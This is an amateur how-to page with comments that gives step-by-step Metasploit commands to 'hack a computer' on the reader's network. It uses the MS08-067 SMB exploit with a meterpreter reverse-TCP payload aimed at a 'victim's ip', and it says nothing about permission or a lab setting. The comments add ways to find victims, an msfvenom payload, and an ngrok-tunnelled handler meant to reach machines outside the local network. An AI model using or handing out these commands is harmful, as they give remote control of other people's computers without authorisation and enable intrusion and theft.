Hack a Computer on Your Network With Kali Linux

467,351

91

54

Posted

Introduction: Hack a Computer on Your Network With Kali Linux

Hey guys!

So you want to hack a computer and you've got Kali linux installed?

Then you are on the right place!

I am going to show you how to hack a computer.

Step 1: Start Kali Linux

Start Kali Linux and start a new terminal.

Step 2: Start the Metasploit Console

Start the Metasploit console by typing: msfconsole

This will take a few moments...

Step 3: The Commands:

So Metasploit started.

Here are the commands you need to type in:

use windows/smb/ms08_067_netapi

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type ifconfig. your ip adress will be somewhere in the output :D)

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445

exploit

(You should connect)

Type help for a list of commands.

Step 4: That's It!

That's it!

You just hacked a computer!

Congrats!

I will probably make more tutorials about hacking and other ways to hack a computer.

So if this didn't work for you, stay tuned!

I think it only works for older versions of windows :(

Also please take a look at my Widows 7 hack tutorial!

>>>

https://www.instructables.com/id/Hack-Windows-7-or-Higher-With-SeToolkit

Share

Recommendations

  • Epilog Challenge 9

    Epilog Challenge 9
  • First Time Author Contest 2018

    First Time Author Contest 2018
  • Sew Warm Contest 2018

    Sew Warm Contest 2018
user

We have a be nice policy.
Please be positive and constructive.

Tips

Questions

Hi there
I have some questions about this:-
1) Can this work with other ports.
2) After all the process it shows the message : exploit completed but no session was created. In this case what to do.
3) Is it only for windows or any other os
4) Can this work with windows 10 and ubuntu.
5) Can we use it outside our network

47 Comments

No you dumbass. You can well see that he used windows/meterpreter/reverse_tcp .-.

Yes it does you just need to change the payload to

python/meterpreter/reverse_tcp LHOST="localhost" LPORT="localport" > pyterpreter.py

So i guess your pretty stupid to answer a question wrong ;P

use nmap to scan for live host on network there are enough tutorials how to do that

The cringe is real. You need to get the local ipadress from the victim. Do this by typing in your command prompt (I'm guessing that you're using a virtual machine) "net view" and now some host names will popup. (Ex: ERIK) Ping the host and no you've got the local ipadress( ipv4) of our victim.

you should figure out

step 1 ngrok tcp 12345

step2 msfvenomm PAYLOAD windows/meterpreter/reverse_tcp lhost 127.0.0.1 lport ngrok

step 3 msfconsole

step 4 use exploit /multi/handler/

set PAYLOAD windows/meterpreter/reverse_tcp

step 5 set lhost 127.0.0.1

step 6 set lport 12345

exploit

and

exploit -j HACK YOUR PC IN OPEN NETWORK 1000%

ADVANCE THANKS